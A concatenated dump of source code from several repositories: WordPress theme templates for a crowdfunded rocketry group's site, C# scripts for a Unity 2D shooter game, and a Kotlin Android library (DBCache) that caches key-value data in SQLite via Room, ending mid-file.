<a style="text-decoration: none;" rel="wp-video-lightbox" href="https://www.youtube.com/watch?v=1i3HDv2s7io&width=640&height=640" title="" onclick="_gaq.push(['_trackEvent','Media','Click','Watch Us on FP']);">
<div class="main_front_section_2_overlay_6 overlay_show">
<span style="">See our intro video</span>
<img src="<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/pointer-black.png" style="width: 12%; vertical-align: middle;">
</div>
</a>
</div>
<?php //----------- Manned top section end -------------------------------------------------------------------------?>
<?php //----------- Widget section ---------------------------------------------------------------------------------?>
<div class="wrapper_front_section_3">
<div class="main_front_section_3"></div>
<div class="main_front_section_3_overlay_1 overlay_show">
<div class="front-widget">
<?php // lastest news col ?>
<div class="widget-header-front">Latest blog posts</div>
<ul>
<?php if ( $query_blog->have_posts() ) : $query_blog->have_posts();
while ( $query_blog->have_posts() ) : $query_blog->the_post(); ?>
<li>
<?php
printf( '<span class="date">%s</span>', get_the_date( 'd.m.Y' ) );
printf( '<div class="widget-content"><a href="%s">%s</a></div>', get_permalink(), get_the_title() );
?>
</li>
<?php endwhile;
else :
endif;
wp_reset_postdata();
?>
</ul>
</div>
</div>
</div>
<?php //----------- Widget section end -----------------------------------------------------------------------------?>
<?php //----------- Section 4 --------------------------------------------------------------------------------------?>
<div class="wrapper_front_section_4">
<div class="main_front_section_4"></div>
</div>
<?php //----------- Section 4 end ----------------------------------------------------------------------------------?>
<?php //----------- Section 5 --------------------------------------------------------------------------------------?>
<div class="wrapper_front_section_5">
<div class="main_front_section_5"></div>
<div class="main_front_section_5_overlay_1 overlay_show">
We’re 100 % crowdfunded.</br>
Donate or join the support group.</br>
your money is the rocketfuel!
</div>
<a href="<?php echo (site_url().'/support-us/'); ?>" onclick="_gaq.push(['_trackEvent','Support','Click','Donate on bottom FP']);">
<div class="main_front_section_5_overlay_2 overlay_show"></div>
</a>
</div>
<?php //----------- Section 5 end ----------------------------------------------------------------------------------?>
<?php
?>
</div>
<?php get_footer('frontlaunch'); ?><file_sep>/copsub/default/page-sponsors.php
<?php
/*
Template Name: Sponsors template
*/
?>
<?php get_header();
global $post;
$pre_sponsors_text = get_field( '_pre_sponsors_text', $post->ID );
$gold_company_sponsors = get_field( '_gold_company_sponsors', $post->ID );
$silver_company_sponsors = get_field( '_silver_company_sponsors', $post->ID );
$private_cash_donations = get_field( '_private_cash_donations', $post->ID );
?>
<div id="content">
<div class="<?php wptouch_post_classes(); ?>">
<div class="post-page-head-area bauhaus">
<h2 class="post-title heading-font"><?php wptouch_the_title(); ?></h2>
<?php if ( bauhaus_should_show_author() ) { ?>
<span class="post-author"><?php the_author(); ?></span>
<?php } ?>
</div>
<div class="post-page-content">
<section class="text">
<?php
echo $pre_sponsors_text;
echo $gold_company_sponsors;
echo "<table>";
$type = 'spons';
$args=array(
'post_type' => $type,
'post_status' => 'publish',
'posts_per_page' => -1,
'caller_get_posts' => 1,
'orderby' => 'title',
'order' => 'ASC',
'cat-spons' => 'gold-company-sponsor' );
$my_query = null;
$my_query = new WP_Query($args);
if( $my_query->have_posts() ) {
while ($my_query->have_posts()) : $my_query->the_post();
$weblink_sponsor = get_field( '_sponsor_weblink', get_the_id() );
$logo_sponsor = get_field( '_sponsor_logo', get_the_id() );
if(strlen($weblink_sponsor) > 2) {
if(strlen($logo_sponsor) > 2) {
?>
<tr><td><a href="<?php echo $weblink_sponsor ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><img src="<?php echo $logo_sponsor?>" width="60"></a></td></tr>
<?php } ?>
<tr><td><a href="<?php echo $weblink_sponsor ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></td></tr>
<?php
} else {
?>
<tr><td><img src="<?php echo $logo_sponsor?>"></td></tr>
<tr><td><?php the_title(); ?></td></tr>
<?php
}
endwhile;
}
wp_reset_query(); // Restore global post data stomped by the_post().
echo "</table>";
echo "<table>";
echo $silver_company_sponsors;
$type = 'spons';
$args=array(
'post_type' => $type,
'post_status' => 'publish',
'posts_per_page' => -1,
'caller_get_posts' => 1,
'orderby' => 'title',
'order' => 'ASC',
'cat-spons' => 'silver-company-sponsor' );
$my_query = null;
$my_query = new WP_Query($args);
if( $my_query->have_posts() ) {
while ($my_query->have_posts()) : $my_query->the_post();
$weblink_sponsor = get_field( '_sponsor_weblink', get_the_id() );
$logo_sponsor = get_field( '_sponsor_logo', get_the_id() );
$hide_sponsorname = get_field( '_hide_sponsorname', get_the_id() );
if(strlen($weblink_sponsor) > 2) {
if(strlen($logo_sponsor) > 2) {
?>
<tr><td><a href="<?php echo $weblink_sponsor ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><img src="<?php echo $logo_sponsor?>" width="60"></a></td></tr>
<?php
}
if($hide_sponsorname == FALSE) {
?>
<tr><td><a href="<?php echo $weblink_sponsor ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></td></tr>
<?php
}
} else {
?>
<tr><td><img src="<?php echo $logo_sponsor?>"></td></tr>
<tr><td><?php the_title(); ?></td></tr>
<?php
}
endwhile;
}
wp_reset_query(); // Restore global post data stomped by the_post().
echo "</table>";
echo $private_cash_donations;
echo "<table>";
$type = 'spons';
$args=array(
'post_type' => $type,
'post_status' => 'publish',
'posts_per_page' => -1,
'caller_get_posts' => 1,
'orderby' => 'title',
'order' => 'ASC',
'cat-spons' => '' );
$my_query = null;
$my_query = new WP_Query($args);
if( $my_query->have_posts() ) {
while ($my_query->have_posts()) : $my_query->the_post();
$weblink_sponsor = get_field( '_sponsor_weblink', get_the_id() );
$sponsor_country = get_field( 'sponsor_country', get_the_id() );
$term_list = wp_get_post_terms(get_the_id(), 'cat-spons', array("fields" => "all"));
$term_slug = $term_list[0]->slug;
if (($term_slug != 'gold-company-sponsor') && ($term_slug != 'silver-company-sponsor')) {
?>
<tr><td><?php the_title(); ?></td><td><?php echo $sponsor_country; ?></td></tr>
<?php
}
endwhile;
}
wp_reset_query(); // Restore global post data stomped by the_post().
echo "</table>";
?>
</section>
</div>
</div>
<?php get_sidebar(); ?>
<?php get_footer(); ?>
<file_sep>/README.md
# wp-touch-copsub<file_sep>/copsub/default/livestream_template.php
<?php
/*
Template Name: Livestream template
*/
?>
<?php get_header();
$server_name = $_SERVER['SERVER_NAME'];
global $post;
$frontpage_id = get_option('page_on_front');
//$url_for_steaming_link = get_field( 'url_for_steaming_link', $frontpage_id );
$url_for_steaming_link = get_youtube_streaming_url_from_text_file();
?>
<div id="content">
<div class="<?php wptouch_post_classes(); ?>">
<div class="post-page-head-area bauhaus">
<h2 class="post-title heading-font"><?php wptouch_the_title(); ?></h2>
<?php if ( bauhaus_should_show_author() ) { ?>
<span class="post-author"><?php the_author(); ?></span>
<?php } ?>
</div>
<?php while ( have_posts() ) : the_post(); ?>
<div class="post-page-content">
<section class="text">
<?php the_content(); ?>
<?php _e( wp_oembed_get( $url_for_steaming_link ) ); ?>
</section>
<?php edit_post_link( __( 'Edit', 'twentythirteen' ), '<span class="edit-link">', '</span>' ); ?>
</div>
<?php //comments_template(); ?>
<?php endwhile; ?>
</duv>
</div>
<?php //get_sidebar(); ?>
<?php get_footer(); ?>
<file_sep>/copsub/default/dynamic-styles.php
<?php
header('Content-type: text/css');
// I can access any WP or theme functions
// here to get values that will be used in
// dynamic css below
?>
/* CSS Starts Here */
.example-selector {
color: <?php echo $color; ?>;
}
.wrappertest {
width: 100%;
/* whatever width you want */
display: inline-block;
position: relative;
background-position: center top;
background-repeat:no-repeat;
background-size:210% !important;
}
.wrappertest:after {
padding-top: 56.25%;
/* 16:9 ratio */
display: block;
content: '';
}
.maintest {
position: absolute;
top: 0;
bottom: 0;
right: 0;
left: 0;
/* let's see it! */
color: white;
}
|
3ca411b37ee2c024fc5fa636f80a7b1ffc0942e7
|
[
"JavaScript",
"Markdown",
"PHP"
] | 10 |
PHP
|
copsub/wp-touch-copsub
|
3fac6e60b01367412fef387c221c856bdbab929b
|
a1e4e2b12faddf3f12c555fc72f1d6503bdb5bf4
|
refs/heads/master
|
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class PlayerCombat : MonoBehaviour
{
public GameObject shield;
public bool shieldInUse = false;
public bool shieldAvailable;
public float shieldCooldown;
public float shieldCooldownLeft;
public string shieldCtrl = "Horizontal_P1";
// Start is called before the first frame update
void Start()
{
shieldAvailable = true;
}
// Update is called once per frame
void Update()
{
shieldCooldownTimer();
}
private void FixedUpdate()
{
useShield();
}
void useShield()
{
if (!shieldInUse && shieldAvailable)
{
if (Input.GetAxis(shieldCtrl)==1)
{
Instantiate(shield, transform);
shieldInUse = true;
}
}
}
void shieldCooldownTimer()
{
if (!shieldAvailable)
{
if (shieldCooldownLeft > 0)
{
shieldCooldownLeft -= Time.deltaTime;
}
else if (shieldCooldownLeft <= 0)
{
shieldAvailable = true;
}
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Weapon : MonoBehaviour
{
public float offset;
public GameObject projectile;
public Transform shotPoint;
public GameObject Pointer;
private float timeBtwShots;
public float startTimeBtwShots;
public int numberOfShots;
private int shotsLeft;
public float shotsCoolDown;
private float cooldownLeft;
private bool onCoolDown;
private string control;
private float rotationZ;
public string shootButton = "Fire1_P1";
void Start()
{
shotsLeft = numberOfShots;
onCoolDown = false;
control = gameObject.GetComponentInParent<Movement>().horizontalCtrl; // Check if being controlled by mouse or joystick
}
void Update()
{
if (onCoolDown){
if (cooldownLeft > 0)
{
cooldownLeft -= Time.deltaTime;
}
else if( cooldownLeft <= 0)
{
onCoolDown = false;
shotsLeft = numberOfShots;
}
}
//Handles the fireball rotation
if (control == "Horizontal_P1")
{
Vector3 difference = Camera.main.ScreenToWorldPoint(Input.mousePosition) - transform.position;
rotationZ = Mathf.Atan2(difference.y, difference.x) * Mathf.Rad2Deg;
Pointer.transform.rotation = Quaternion.Euler(0f, 0f, rotationZ);
}else if(control == "Horizontal_P2")
{
float horizontal = Input.GetAxis("RightAnalog_horizontal");
float vertical = Input.GetAxis("RightAnalog_vertical");
if (horizontal != 0 || vertical != 0 )
{
rotationZ = Mathf.Atan2(horizontal, vertical) * Mathf.Rad2Deg;
Pointer.transform.rotation = Quaternion.Euler(new Vector3(0f, 0f, rotationZ + offset));
}
}
if (timeBtwShots <= 0 && shotsLeft > 0)
{
if (Input.GetButton(shootButton))
{
if (control == "Horizontal_P1")
{
Instantiate(projectile, shotPoint.position, Quaternion.Euler(0f, 0f, rotationZ + offset));
timeBtwShots = startTimeBtwShots;
shotsLeft--;
}
else if (control == "Horizontal_P2")
{
Instantiate(projectile, shotPoint.position, Quaternion.Euler(0f, 0f, rotationZ + offset - 90));
timeBtwShots = startTimeBtwShots;
shotsLeft--;
}
}
}
else if (shotsLeft == 0 && !onCoolDown)
{
cooldownLeft = shotsCoolDown;
onCoolDown = true;
}
else
{
timeBtwShots -= Time.deltaTime;
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Shield : MonoBehaviour
{
private int lifes = 3;
public float shieldLifeTime;
private float shieldTimeRemaining;
// Start is called before the first frame update
void Start()
{
shieldTimeRemaining = shieldLifeTime;
}
// Update is called once per frame
void Update()
{
if (lifes <= 0)
{
DestroyShield();
}
shieldTimeRemaining -= Time.deltaTime;
if(shieldTimeRemaining <= 0)
{
DestroyShield();
}
}
private void OnTriggerEnter2D(Collider2D collision)
{
if (collision.CompareTag("Bullet"))
{
lifes--;
collision.GetComponent<Bullet>().DestroyBullet();
}
}
private void DestroyShield()
{
Destroy(gameObject);
FindObjectOfType<PlayerCombat>().shieldInUse = false;
FindObjectOfType<PlayerCombat>().shieldCooldownLeft = FindObjectOfType<PlayerCombat>().shieldCooldown;
FindObjectOfType<PlayerCombat>().shieldAvailable = false;
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Projectile : MonoBehaviour
{
public float speed;
public float lifeTime;
//public GameObject destroyEffect;
public float distance;
public LayerMask WhatToHit;
// Start is called before the first frame update
void Start()
{
Invoke("DestroyProjectile", lifeTime);
}
// Update is called once per frame
void Update()
{
RaycastHit2D hitInfo = Physics2D.Raycast(transform.position, transform.up, distance, WhatToHit);
if (hitInfo.collider != null)
{
if (hitInfo.collider.CompareTag("Enemy"))
{
hitInfo.collider.GetComponent<Enemy>().TakeDamage(20);
}
DestroyProjectile();
}
transform.Translate(Vector2.up * speed * Time.deltaTime);
}
private void OnTriggerEnter2D(Collider2D collision)
{
if (collision.CompareTag("Player1")|| collision.CompareTag("Player2")) {
collision.GetComponent<Player>().damage(15);
Vector3 direction = transform.position - collision.transform.position; //get the direction of collision
direction = direction * -1; // Invert the direction
collision.GetComponent<Player>().KnockBack(direction); //Knockback the player
DestroyProjectile();
}
}
void DestroyProjectile()
{
//Instantiate(destroyEffect, transform.position, Quaternion.identity);
Destroy(gameObject);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine.SceneManagement;
using UnityEngine;
public class GameOverManager : MonoBehaviour
{
public float restartDelay = 5f;
public Player player1;
public Player player2;
Animator anim;
float restartTimer;
private void Awake()
{
anim = GetComponent<Animator>();
}
private void Update()
{
if(player1.isDead())
{
Player2Won();
}else if (player2.isDead())
{
Player1Won();
}
}
public void Player1Won()
{
anim.SetTrigger("Player1Won");
restartTimer += Time.deltaTime;
if (restartTimer >= restartDelay)
{
SceneManager.LoadScene(SceneManager.GetActiveScene().name);
}
}
public void Player2Won()
{
anim.SetTrigger("Player2Won");
restartTimer += Time.deltaTime;
if (restartTimer >= restartDelay)
{
SceneManager.LoadScene(SceneManager.GetActiveScene().name);
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class HealthBar : MonoBehaviour
{
public Player player;
private void HealthSystem_OnHealthChanged(object sender, System.EventArgs e)
{
transform.Find("Container").localScale = new Vector3(player.GetHealthPercent(), 1);
}
private void Update()
{
if (player.GetHealthPercent() > 0)
{
transform.Find("Container").localScale = new Vector3(player.GetHealthPercent(), 1);
}
else
{
transform.Find("Container").localScale = new Vector3(0, 1);
}
}
}
<file_sep># Unity 2D Game
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Bullet : MonoBehaviour
{
public float speed;
public float destroyDelay;
private float destroyTimer;
private Transform player;
private Vector2 target;
private Vector3 movementVector;
private void Start()
{
player = GameObject.FindGameObjectWithTag("Player").transform;
target = new Vector2(player.position.x, player.position.y);
movementVector = (player.position - transform.position).normalized * speed;
}
private void Update()
{
transform.position += movementVector * Time.deltaTime;
Destroy(gameObject, 10);
}
private void OnTriggerEnter2D(Collider2D collision)
{
DestroyBullet();
if (collision.CompareTag("Player"))
{
collision.GetComponent<Player>().damage(15);
FindObjectOfType<AudioManager>().Play("Hurt");
}
}
public void DestroyBullet()
{
Destroy(gameObject);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Player : MonoBehaviour
{
private Transform position;
private int health;
private int healthMax = 100;
private Rigidbody2D rb2d;
// Start is called before the first frame update
void Start()
{
health = healthMax;
rb2d = GetComponent<Rigidbody2D>();
}
// Update is called once per frame
void Update()
{
position = gameObject.transform;
}
public Transform GetPlayerPosition()
{
return position;
}
public void damage(int amount)
{
health -= amount;
}
public void heal(int amount)
{
health += amount;
}
public float GetHealthPercent()
{
return (float)health / healthMax;
}
public int getHealth()
{
return health;
}
public bool isDead()
{
return health <= 0;
}
public void KnockBack(Vector3 direction)
{
rb2d.velocity = new Vector2(0, 0);
rb2d.AddForce(direction * 7, ForceMode2D.Impulse);
}
}
<file_sep>using UnityEngine;
using UnityEngine.SceneManagement;
public class GameHandler : MonoBehaviour
{
public HealthBar healthBar;
public float restartDelay = 1f;
// Start is called before the first frame update
private void Start()
{
FindObjectOfType<AudioManager>().Play("Music");
}
private void Update()
{
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Movement : MonoBehaviour
{
public float movespeed = 20f;
public float JumpPower = 5f;
public bool isGrounded = false;
public bool isRunning = false;
public bool facingRight = true;
public float direction = 1f;
public int jumpsMade = 0;
public string jumpButton = "Jump_P1";
public string horizontalCtrl = "Horizontal_P1";
private Animator anim;
private SpriteRenderer spriteR;
private Rigidbody2D rb;
// Start is called before the first frame update
void Start()
{
anim = GetComponent<Animator>();
spriteR = GetComponent<SpriteRenderer>();
rb = GetComponent<Rigidbody2D>();
}
private void Update()
{
}
private void FixedUpdate()
{
// CODE TO HANDLE ANIMATIONS AND FLIPPING CHARACTER
Jump();
if (direction < 0)
{
if (facingRight)
{
facingRight = false;
gameObject.GetComponent<SpriteRenderer>().flipX = true;
//gameObject.transform.localScale = new Vector3(transform.localScale.x * -1, transform.localScale.y, transform.localScale.z);
}
if (isGrounded)
anim.Play("Run");
}
else if(direction > 0)
{
if (!facingRight)
{
facingRight = true;
//gameObject.transform.localScale = new Vector3(transform.localScale.x * -1, transform.localScale.y, transform.localScale.z);
gameObject.GetComponent<SpriteRenderer>().flipX = false;
}
if (isGrounded)
anim.Play("Run");
}
else if ((direction > -1 || direction < 1) && isGrounded)
{
anim.Play("Idle");
}
//CODE TO MOVE PLAYER
if (!gameObject.GetComponent<Player>().isDead()) // Player moves only if alive
{
direction = Input.GetAxisRaw(horizontalCtrl);
Debug.Log(direction);
Vector3 movement = new Vector3(direction, 0f, 0f);
transform.position += movement * Time.deltaTime * movespeed;
}
}
//FUNCTION TO JUMP
void Jump()
{
if (!gameObject.GetComponent<Player>().isDead()) // Player jumps only if alive
{
if (Input.GetButtonDown(jumpButton) && isGrounded) //First Jump
{
gameObject.GetComponent<Rigidbody2D>().AddForce(new Vector2(0f, JumpPower), ForceMode2D.Impulse);
jumpsMade = 1;
}
else if (Input.GetButtonDown(jumpButton) && jumpsMade == 1) // Double Jump
{
gameObject.GetComponent<Rigidbody2D>().velocity = new Vector2(gameObject.GetComponent<Rigidbody2D>().velocity.x, 0f);
gameObject.GetComponent<Rigidbody2D>().AddForce(new Vector2(0f, JumpPower), ForceMode2D.Impulse);
jumpsMade = 0;
}
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Enemy : MonoBehaviour
{
private float speed;
private float stoppingDistance;
private float retreatDistance;
public int health;
private float timeBtwShots;
public float startTimeBtwShots;
public GameObject bullet;
public Transform player;
private SpriteRenderer spriteR;
// Start is called before the first frame update
void Start()
{
stoppingDistance = Random.Range(7, 15);
retreatDistance = Random.Range(3, 6);
speed = Random.Range(5, 15);
player = GameObject.FindGameObjectWithTag("Player").transform;
timeBtwShots = startTimeBtwShots;
spriteR = GetComponent<SpriteRenderer>();
}
// Update is called once per frame
void FixedUpdate()
{
Flip();
if(Vector2.Distance(transform.position, player.position) > stoppingDistance)
{
transform.position = Vector2.MoveTowards(transform.position, player.position, speed * Time.deltaTime);
}else if(Vector2.Distance(transform.position, player.position) < stoppingDistance && Vector2.Distance(transform.position, player.position) > retreatDistance){
transform.position = this.transform.position;
}else if(Vector2.Distance(transform.position, player.position)< retreatDistance)
{
transform.position = Vector2.MoveTowards(transform.position, player.position, -speed * Time.deltaTime);
}
if (!FindObjectOfType<Player>().isDead())
{
if (timeBtwShots <= 0) // Code To Shoot
{
Instantiate(bullet, transform.position, Quaternion.identity);
timeBtwShots = startTimeBtwShots;
}
else
{
timeBtwShots -= Time.deltaTime;
}
}
}
private void Update()
{
if (health <= 0)
{
Destroy(gameObject);
}
}
public void TakeDamage(int damage)
{
health -= damage;
}
private void OnTriggerEnter2D(Collider2D collision) //Handle Obstacle Jumping
{
gameObject.GetComponent<Rigidbody2D>().velocity = new Vector2(gameObject.GetComponent<Rigidbody2D>().velocity.x, 0f);
gameObject.GetComponent<Rigidbody2D>().AddForce(new Vector2(0f, 14), ForceMode2D.Impulse);
}
private void Flip()
{
float playerX = player.position.x;
float enemyX = gameObject.transform.position.x;
if (playerX > enemyX)
{
spriteR.flipX = true;
}
else
{
spriteR.flipX = false;
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class EnemyChestCollider : MonoBehaviour
{
public bool foundObject;
private void OnCollisionEnter2D(Collision2D collision)
{
foundObject = true;
}
}
|
ff9b080d87c891bb645d33cbccda0c98970b72d9
|
[
"Markdown",
"C#"
] | 13 |
C#
|
DanielVicente12/Unity-2D-Game
|
b2c24ffdfd4558e5cdd9c14a61a93ef7d7fb4b30
|
b5e26344a6af83aee033005b08da8e57e289a31f
|
refs/heads/main
|
<repo_name>MasterJhonny/curso-npm<file_sep>/main.js
let num1 = 34
let num2 = 45
console.log(`${num1} + ${num2} = ${num1 + num2}`);
|
a54dde8e3227deed96cad6d8b5bba89ce0735dce
|
[
"JavaScript"
] | 1 |
JavaScript
|
MasterJhonny/curso-npm
|
ca391637a673a0b774c778b44e0f619c18025b2c
|
68ef18e713d0df8e73a36b611381417376a06ef4
|
refs/heads/master
|
<repo_name>wytings/DBCache<file_sep>/library/src/main/java/com/wytings/dbcache/ICacheDao.kt
package com.wytings.dbcache
import androidx.room.*
/**
* Created by Rex.Wei on 2019/6/1.
*
* @author Rex.Wei
*/
@Dao
interface ICacheDao {
@Query("SELECT * FROM t_cache_table WHERE `key` = :key LIMIT 1")
fun querySingleEntity(key: String): CacheEntity?
@Query("SELECT * FROM t_cache_table WHERE `key` IN (:keys) ORDER BY update_time DESC")
fun queryEntities(vararg keys: String): List<CacheEntity>
@Query("SELECT * FROM t_cache_table WHERE `key` LIKE :like ORDER BY update_time DESC")
fun queryAllEntities(like: String): List<CacheEntity>
@Insert(onConflict = OnConflictStrategy.REPLACE)
fun insertOrReplaceEntities(vararg entities: CacheEntity): LongArray
@Query("SELECT COUNT(*) FROM t_cache_table WHERE `key` LIKE :like")
fun queryNumberOfRows(like: String): Long
@Query("DELETE FROM t_cache_table WHERE `key` LIKE :like")
fun deleteAll(like: String)
@Delete
fun deleteEntities(vararg entities: CacheEntity): Int
}
<file_sep>/library/src/main/java/com/wytings/dbcache/DBCacheMgr.kt
package com.wytings.dbcache
import android.app.Application
import java.lang.Exception
import java.lang.reflect.Type
import java.util.*
import java.util.concurrent.ConcurrentHashMap
/**
* Created by Rex.Wei on 2019/6/1.
*
* @author Rex.Wei
*/
class DBCacheMgr private constructor(zone: String) {
private val cacheZone = "$zone$SUFFIX"
private fun cacheDao(): ICacheDao {
return AbsRoomDatabase.obtain().cacheDao()
}
private fun getRealKey(key: String): String {
return cacheZone + key
}
fun save(map: Map<String, Any>?) {
if (map.isNullOrEmpty()) {
return
}
val entities = mutableListOf<CacheEntity>()
for ((key, value) in map) {
val cacheEntity = CacheEntity(getRealKey(key))
cacheEntity.value = objectToString(value)
cacheEntity.updateTime = System.currentTimeMillis()
entities.add(cacheEntity)
}
cacheDao().insertOrReplaceEntities(*entities.toTypedArray())
}
fun getString(key: String, defaultValue: String): String {
val entity = cacheDao().querySingleEntity(getRealKey(key)) ?: return defaultValue
return entity.value
}
fun getLong(key: String, defaultValue: Long): Long {
return getDouble(key, defaultValue.toDouble()).toLong()
}
fun getDouble(key: String, defaultValue: Double): Double {
val value = getString(key, "").toDoubleOrNull()
return value ?: defaultValue
}
fun save(key: String, obj: Any) {
try {
save(mapOf(key to objectToString(obj)))
} catch (e: Exception) {
e.printStackTrace()
}
}
fun <T> getObject(key: String, typeOfT: Type): T? {
val value = getString(key, "")
return try {
jsonParser.from(value, typeOfT)
} catch (e: Exception) {
e.printStackTrace()
null
}
}
private fun objectToString(obj: Any): String {
return when (obj) {
is Number -> obj.toString()
is String -> obj
else -> jsonParser.to(obj)
}
}
fun delete(vararg keys: String) {
if (keys.isEmpty()) {
return
}
val entities = mutableListOf<CacheEntity>()
for (i in keys.indices) {
entities[i] = CacheEntity(getRealKey(keys[i]))
}
cacheDao().deleteEntities(*entities.toTypedArray())
}
fun getCount(): Long {
return cacheDao().queryNumberOfRows("$cacheZone%")
}
fun getAll(): Map<String, String> {
val entities = cacheDao().queryAllEntities("$cacheZone%")
val map = HashMap<String, String>(entities.size)
for (entity in entities) {
map[entity.key.replaceFirst(cacheZone, "")] = entity.value
}
return map
}
fun deleteAll() {
cacheDao().deleteAll("$cacheZone%")
}
companion object {
private const val SUFFIX = "$$$"
private lateinit var jsonParser: IJSONParser
@JvmStatic
@JvmOverloads
fun initialize(application: Application, parser: IJSONParser = DefaultJsonParser()) {
AbsRoomDatabase.initialize(application)
jsonParser = parser
}
private val managerMap = ConcurrentHashMap<String, DBCacheMgr>()
@JvmStatic
fun obtain(zone: String): DBCacheMgr {
var manager = managerMap[zone]
if (manager == null) {
manager = DBCacheMgr(zone)
managerMap[zone] = manager
}
return manager
}
}
}
<file_sep>/app/src/main/java/com/wytings/demo/MainActivity.kt
package com.wytings.demo
import androidx.appcompat.app.AppCompatActivity
import android.os.Bundle
import com.wytings.dbcache.DBCacheMgr
import kotlinx.android.synthetic.main.activity_main.*
class MainActivity : AppCompatActivity() {
private val zone = "zone_123"
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
save.setOnClickListener {
DBCacheMgr.obtain(zone).save("key1", 123)
DBCacheMgr.obtain(zone).save("key2", 123.456)
DBCacheMgr.obtain(zone).save("key3", -123)
DBCacheMgr.obtain(zone).save("key4", "hello")
DBCacheMgr.obtain(zone).save("key5", createMap())
}
delete.setOnClickListener {
DBCacheMgr.obtain(zone).deleteAll()
}
read.setOnClickListener {
DBCacheMgr.obtain(zone).getAll().forEach {
println("${it.key} -> ${it.value}")
}
println(
"$zone total count is ${DBCacheMgr.obtain(zone).getCount()}"
)
println(
" key3 is ${DBCacheMgr.obtain(zone).getLong("key3", 10)}"
)
}
}
private fun createMap(): Map<String, Any> {
return mapOf("1" to "haha", "2" to "hoho", "3" to 100)
}
}
<file_sep>/README.md
# DBCache
cache data with SQLite on Android
### When to use DBCache
SharePreferences or other local cache provider which are based on `File` will update whole file every time when anything need to update.
If this have affected the performance of your app, then DBCache may help you.
### Quick Tutorial
You can Setup DBCacheMgr on App startup, say your `App`, add these lines:
```Java
public class App extends Application {
@Override
public void onCreate() {
super.onCreate();
DBCacheMgr.initialize(this);
}
}
```
```Java
private val zone = "user_info" // like cache fileName
DBCacheMgr.obtain(zone).save("key1", 123)
DBCacheMgr.obtain(zone).save("key2", 123.456)
DBCacheMgr.obtain(zone).save("key3", -123)
DBCacheMgr.obtain(zone).save("key4", "hello")
DBCacheMgr.obtain(zone).save("key5", createMap())
DBCacheMgr.obtain(zone).deleteAll()
DBCacheMgr.obtain(zone).getAll().forEach {
println("${it.key} -> ${it.value}")
}
println(
"$zone total count is ${DBCacheMgr.obtain(zone).getCount()}"
)
println(
" key3 is ${DBCacheMgr.obtain(zone).getLong("key3", 10)}"
)
}
}
private fun createMap(): Map<String, Any> {
return mapOf("1" to "haha", "2" to "hoho", "3" to 100)
}
```
### Download
Gradle:
```gradle
dependencies {
implementation 'com.wytings.dbcache:dbcache:1.0.0'
}
```
<file_sep>/library/src/main/java/com/wytings/dbcache/CacheEntity.kt
package com.wytings.dbcache
import androidx.room.ColumnInfo
import androidx.room.Entity
import androidx.room.PrimaryKey
/**
* Created by Rex.Wei on 2019/6/1.
*
* @author Rex.Wei
*/
@Entity(tableName = "t_cache_table")
class CacheEntity(
@field:PrimaryKey
@field:ColumnInfo(name = "key")
val key: String
) {
@ColumnInfo(name = "value")
var value: String = ""
@ColumnInfo(name = "create_time")
var createTime: Long = System.currentTimeMillis()
@ColumnInfo(name = "update_time")
var updateTime: Long = 0
override fun toString(): String {
return "CacheEntity{" +
"key='" + key + '\''.toString() +
", value='" + value + '\''.toString() +
", createTime=" + createTime +
", updateTime=" + updateTime +
'}'.toString()
}
}
<file_sep>/library/src/main/java/com/wytings/dbcache/IJSONParser.kt
package com.wytings.dbcache
import java.lang.reflect.Type
/**
* Created by Rex.Wei on 2019-06-02.
*
* @author Rex.Wei
*/
interface IJSONParser {
fun <T> from(json: String, typeOfT: Type): T?
fun to(obj: Any): String
}
<file_sep>/library/src/main/java/com/wytings/dbcache/DefaultJsonParser.kt
package com.wytings.dbcache
import com.google.gson.GsonBuilder
import java.lang.reflect.Type
/**
* Created by Rex.Wei on 2019-06-02.
*
* @author Rex.Wei
*/
class DefaultJsonParser : IJSONParser {
private val helper = GsonBuilder().setLenient().setPrettyPrinting().create()
override fun <T> from(json: String, typeOfT: Type): T? {
return try {
helper.fromJson(json, typeOfT)
} catch (e: Exception) {
e.printStackTrace()
null
}
}
override fun to(obj: Any): String {
return try {
helper.toJson(obj)
} catch (e: Exception) {
e.printStackTrace()
""
}
}
}
<file_sep>/library/src/main/java/com/wytings/dbcache/AbsRoomDatabase.kt
package com.wytings.dbcache
import android.app.Application
import android.text.TextUtils
import androidx.room.Database
import androidx.room.Room
import androidx.room.RoomDatabase
import java.io.File
import java.util.concurrent.ConcurrentHashMap
/**
* Created on 2019/6/1.
*
* @author Rex.Wei
*/
@Database(entities = [CacheEntity::class], version = 1)
abstract class AbsRoomDatabase : RoomDatabase() {
abstract fun cacheDao(): ICacheDao
companion object {
private val dataBaseMap = ConcurrentHashMap<String, AbsRoomDatabase>()
private const val DB_NAME = "database_cache_room.db"
@Volatile
private var application: Application? = null
private var defaultDatabasePath = ""
get() {
if (TextUtils.isEmpty(field)) {
field = File(application!!.filesDir, DB_NAME).absolutePath
}
return field
}
@JvmStatic
fun initialize(app: Application) {
application = app
}
@JvmStatic
@Synchronized
fun obtain(absoluteDatabasePath: String = defaultDatabasePath): AbsRoomDatabase {
var manager = dataBaseMap[absoluteDatabasePath]
if (manager == null) {
manager = Room.databaseBuilder(application!!, AbsRoomDatabase::class.java, absoluteDatabasePath)
.allowMainThreadQueries()
